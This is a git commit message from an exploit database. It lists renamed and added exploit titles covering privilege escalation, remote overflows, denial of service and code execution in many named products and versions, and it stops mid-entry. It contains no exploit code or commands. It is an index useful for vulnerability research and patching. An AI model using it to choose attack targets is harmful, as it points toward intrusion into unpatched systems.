From 6f71665f8a5043cda97cc65e9dca24a11cd8020a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Nov 2017 05:02:28 +0000 Subject: [PATCH] DB: 2017-11-23 28 new exploits Apache 2.0.45 - 'APR' Crash IPD (Integrity Protection Driver) - Denial of Service Ubuntu 6.06 DHCPd - Remote Denial of Service Ubuntu 6.06 - DHCPd Remote Denial of Service Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC) CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC) Adobe Reader - Escape From '.PDF' Oracle Solaris - 'su' Crash SunOS 4.1.3 - kmem setgid /etc/crash Solaris 2.5.1 - 'Ping' System Panic (Denial of Service) Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - 'autofs' Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service) Adobe Flash - Use-After-Free in Drawing Methods 'this' Adobe Flash - Drawing Methods 'this' Use-After-Free Symantec AntiVirus - Integer Overflow in TNEF Decoder Symantec AntiVirus - TNEF Decoder Integer Overflow Apple iOS/macOS - NSKeyedArchiver Heap Corruption Due to Rounding Error in 'TIKeyboardLayout initWithCoder:' Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin' Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty' Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service) Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service) Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval' Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service) Microsoft Edge Chakra - Accesses to Uninitialized Pointers in 'StackScriptFunction::BoxState::Box' Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service) Xen - Unbounded Recursion in Pagetable De-typing Xen - Pagetable De-typing Unbounded Recursion Vonage VDV-23 - Denial of Service WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free WebKit - 'WebCore::InputType::element' Use-After-Free WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free WebKit - 'WebCore::FormSubmission::create' Use-After-Free IBM DB2 - Universal Database 7.2 'db2licm' Local IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow OpenBSD - 'ibcs2_exec' Kernel Local OpenBSD - 'ibcs2_exec' Kernel Code Execution SuSE Linux 9.0 - YaST Configuration Skribt Local SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files BSDi 3.0/4.0 - rcvtty[mh] Local BSDi 3.0/4.0 - 'rcvtty[mh]' Privilege Escalation Solaris locale - Format Strings 'noexec stack' Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow RedHat 6.1 man - 'egid 15' Local RedHat 6.1 - 'man' Local Overflow / Privilege Escalation splitvt < 1.6.5 - Local splitvt < 1.6.5 - Overflow IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Privilege Escalation Slackware 7.1 - '/usr/bin/mail' Local Slackware 7.1 - '/usr/bin/mail' Privilege Escalation GLIBC 2.1.3 - LD_PRELOAD Local GLIBC 2.1.3 - 'LD_PRELOAD' Privilege Escalation Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution LibXt - 'XtAppInitialize()' Overflow *xterm LibXt - 'XtAppInitialize()' Local Overflow *xterm ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Overflow AOL Instant Messenger AIM - 'Away' Message Local OpenBSD - 'ftp' ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow AOL Instant Messenger AIM - 'Away' Message Local Overflow OpenBSD - 'ftp' Local Overflow IPD (Integrity Protection Driver) - Local XV 3.x - '.BMP' Parsing Local Buffer Overflow htpasswd Apache 1.3.31 - Local htpasswd Apache 1.3.31 - Overflow GlobalScape - CuteFTP macros '.mcr' Local BSD bmon 1.2.1_2 - Local GlobalScape - CuteFTP macros '.mcr' Local File Write BSD bmon 1.2.1_2 - Local acls Bypass Microsoft Windows - Improper Token Validation Local Microsoft Windows - Improper Token Validation Privilege Escalation Apple iTunes - Playlist Parsing Local Buffer Overflow Setuid perl - 'PerlIO_Debug()' Overflow Setuid perl - 'PerlIO_Debug()' Local Overflow DelphiTurk e-Posta 1.0 - Local GNU a2ps - 'Anything to PostScript' Not SUID Local DelphiTurk e-Posta 1.0 - Credential Recover GNU a2ps - Anything to PostScript Not SUID Local Overflow GetDataBack Data Recovery 2.31 - Local GetDataBack Data Recovery 2.31 - Licence Recover Exim 4.41 - 'dns_build_reverse' Local Exim 4.41 - 'dns_build_reverse' Local Read Emails Willing Webcam 2.8 - Licence Information Disclosure Local Willing Webcam 2.8 - Licence Information Disclosure Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow TIBCO Rendezvous 7.4.11 - Password Extractor Local TIBCO Rendezvous 7.4.11 - Password Extractor Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Apache 1.3.33/1.3.34 (Ubuntu / Debian) - CGI TTY Privilege Escalation Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Privilege Escalation Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP) Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP) Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash' Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash' Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection Debian XTERM - 'DECRQSS/comments' Debian XTERM - 'DECRQSS/comments' Code Execution BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow HyperVM - File Permissions Local HyperVM - File Permissions Credential Disclosure Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Remote Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Overflow VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow Adobe Reader - Escape From '.PDF' Execute Embedded Executable Free MP3 CD Ripper 2.6 - '.wav' Free MP3 CD Ripper 2.6 - '.wav' Local Overflow GSM SIM Utility 5.15 - Direct RET Local GSM SIM Utility 5.15 - Direct RET Overflow Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow Oracle Solaris - 'su' Local Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution Viscom VideoEdit Gold ActiveX 8.0 - Code Execution Digital Music Pad 8.2.3.4.8 - '.pls' Overflow (SEH) Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH) Adobe Flash Player - 'Button' Remote Code Execution (Metasploit) Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit) MPlayer Lite r33064 - '.m3u' Overflow (SEH) MPlayer Lite r33064 - '.m3u' Local Overflow (SEH) ACDSee FotoSlate - '.PLP' File 'id' Overflow (Metasploit) ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit) Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Overflow Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Overflow / Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation Microsoft Windows - 'April Fools 2001' Microsoft Windows - 'April Fools 2001' Set Incorrect Date Solaris 2.5.1 - 'Ping' BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Overflow / Privilege Escalation (1) BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1) Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password' Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (3) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3) Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages Solaris 7.0 - 'chkperm' Solaris 7.0 - 'chkperm' Privilege Escalation S.u.S.E. Linux 5.2 - 'gnuplot' S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation S.u.S.E. 5.2 - 'lpc' Privilege Escalation S.u.S.E Linux 5.2 - 'lpc' Privilege Escalation NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File SGI IRIX 6.0.1 - 'colorview' SGI IRIX 6.0.1 - 'colorview' Read Files SGI IRIX 6.2 - 'day5notifier' SGI IRIX 6.2 - 'day5notifier' Privilege Escalation SGI IRIX 6.4 - 'datman'/'cdman' SGI IRIX 6.4 - 'datman'/'cdman' Privilege Escalation SGI IRIX 6.4 - 'login' SGI IRIX 6.4 - 'login' Privilege Escalation SGI IRIX 6.4 - 'rmail' SGI IRIX 6.4 - 'rmail' Privilege Escalation SGI IRIX 5.1/5.2 - 'sgihelp' SGI IRIX 5.1/5.2 - 'sgihelp' Privilege Escalation Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (2) RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1) RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2) RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1) RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2) Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Privilege Escalation S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow S.u.S.E. Linux 6.1/6.2 - 'cwdtools' SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation Solaris 7.0 - 'kcms_configure' Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation FreeBSD 3.3 - Seyon setgid Dialer FreeBSD 3.3 - Seyon SetGID Dialer SGI IRIX 6.2 - 'midikeys'/'soundplayer' SGI IRIX 6.2 - 'midikeys'/'soundplayer' Privilege Escalation Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Privilege Escalation Corel Linux OS 1.0 - 'setxconf' Corel Linux OS 1.0 - 'setxconf' Privilege Escalation Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Privilege Escalation S.u.S.E. Linux 6.x - Arbitrary File Deletion SuSE Linux 6.x - Arbitrary File Deletion S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow SuSE Linux 6.3/6.4 Gnomelib - Buffer Overflow RedHat Linux 6.0/6.1/6.2 - 'pam_console' RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3) CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open' CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Privilege Escalation Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man '-l' Format String Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass Samhain Labs 1.x - HSFTP Remote Format String Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution LiquidXML Studio 2010 - ActiveX Remote LiquidXML Studio 2010 - ActiveX Code Execution HexChat 2.9.4 - Local HexChat 2.9.4 - Overflow Winamp 5.63 - 'winamp.ini' Local Winamp 5.63 - 'winamp.ini' Local Overflow Apple 2.0.4 - Safari Local Apple 2.0.4 - Safari Local Cross-Site Scripting Gold MP4 Player - '.swf' Local Gold MP4 Player - '.swf' Local Overflow Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation Linux Kernel - 'offset2lib Stack Clash' Linux Kernel - 'offset2lib' Stack Clash Microsoft IIS - WebDAV 'ntdll.dll' Remote Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow Microsoft Windows 2000/XP - SMB Authentication Remote Microsoft Windows 2000/XP - SMB Authentication Remote Overflow Apache 2.0.45 - 'APR' Remote Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow Microsoft Windows Media Services - 'nsiislog.dll' Remote Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow Citadel/UX BBS 6.07 - Remote Citadel/UX BBS 6.07 - Remote Overflow NIPrint LPD-LPR Print Server 4.10 - Remote NIPrint LPD-LPR Print Server 4.10 - Remote Overflow IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow INND/NNRP < 1.6.x - Overflow INND/NNRP < 1.6.x - Remote Overflow OpenBSD ftpd 2.6/2.7 - Remote OpenBSD ftpd 2.6/2.7 - Remote Overflow IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow OpenFTPd 0.30.2 - Remote OpenFTPd 0.30.2 - Remote Overflow WU-IMAP 2000.287(1-2) - Remote WU-IMAP 2000.287(1-2) - Remote Overflow XV 3.x - '.BMP' Parsing Local Buffer Overflow PHP 4.3.7/5.0.0RC3 - memory_limit Remote PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow SHOUTcast DNAS/Linux 1.9.4 - Format String Remote SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow Apple iTunes - Playlist Parsing Local Buffer Overflow 3CServer 1.1 (FTP Server) - Remote 3CServer 1.1 (FTP Server) - Remote Overflow SHOUTcast 1.9.4 (Windows) - File Request Format String Remote SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow LimeWire 4.1.2 < 4.5.6 - 'GET' Remote LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow MailEnable Enterprise 1.x - IMAPd Remote MailEnable Enterprise 1.x - IMAPd Remote Overflow Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow HP OpenView OmniBack II - Generic Remote HP OpenView OmniBack II - Generic Remote Command Execution CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow CA BrightStor ARCserve Backup - Overflow CA BrightStor ARCserve Backup - Remote Overflow HP OpenView Network Node Manager 7.50 - Remote DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote HP OpenView Network Node Manager 7.50 - Remote Command Execution DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution Mercury Mail Transport System 4.01b - PH SERVER Remote Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow Microsoft DNS Server - Dynamic DNS Updates Remote Microsoft DNS Server - Dynamic DNS Update/Change Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow IBM Lotus Domino Server 6.5 - Unauthenticated Remote IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow IBM Tivoli Provisioning Manager - Unauthenticated Remote IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter) HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write Apache Tomcat Connector mod_jk - 'exec-shield' Remote Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution Lighttpd 1.4.16 - FastCGI Header Overflow Remote Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution Lighttpd 1.4.17 - FastCGI Header Overflow Remote Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution Move Networks Quantum Streaming Player - Overflow (SEH) Move Networks Quantum Streaming Player - Remote Overflow (SEH) Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2) Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download Sun Solaris 10 - snoop(1M) Utility Remote Sun Solaris 10 - snoop(1M) Utility Remote Command Execution NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution Autodesk DWF Viewer Control / LiveUpdate Module - Remote Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC) CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC) Samba 2.2.x - 'nttrans' Overflow (Metasploit) Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) Unreal Tournament 2004 - 'Secure' Overflow (Metasploit) Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit) BigAnt Server 2.52 - Overflow (SEH) BigAnt Server 2.52 - Remote Overflow (SEH) NetTransport Download Manager 2.90.510 - Overflow (SEH) NetTransport Download Manager 2.90.510 - Remote Overflow (SEH) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow Xftp client 3.0 - 'PWD' Remote Xftp client 3.0 - 'PWD' Remote Overflow File Sharing Wizard 1.5.0 - Overflow (SEH) File Sharing Wizard 1.5.0 - Remote Overflow (SEH) Sun Java Web Server 7.0 u7 - Remote Sun Java Web Server 7.0 u7 - Remote Overflow Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass) Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass) SopCast 3.2.9 - Remote SopCast 3.2.9 - Remote Command Execution Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Mozilla Firefox 3.6.8 < 3.6.11 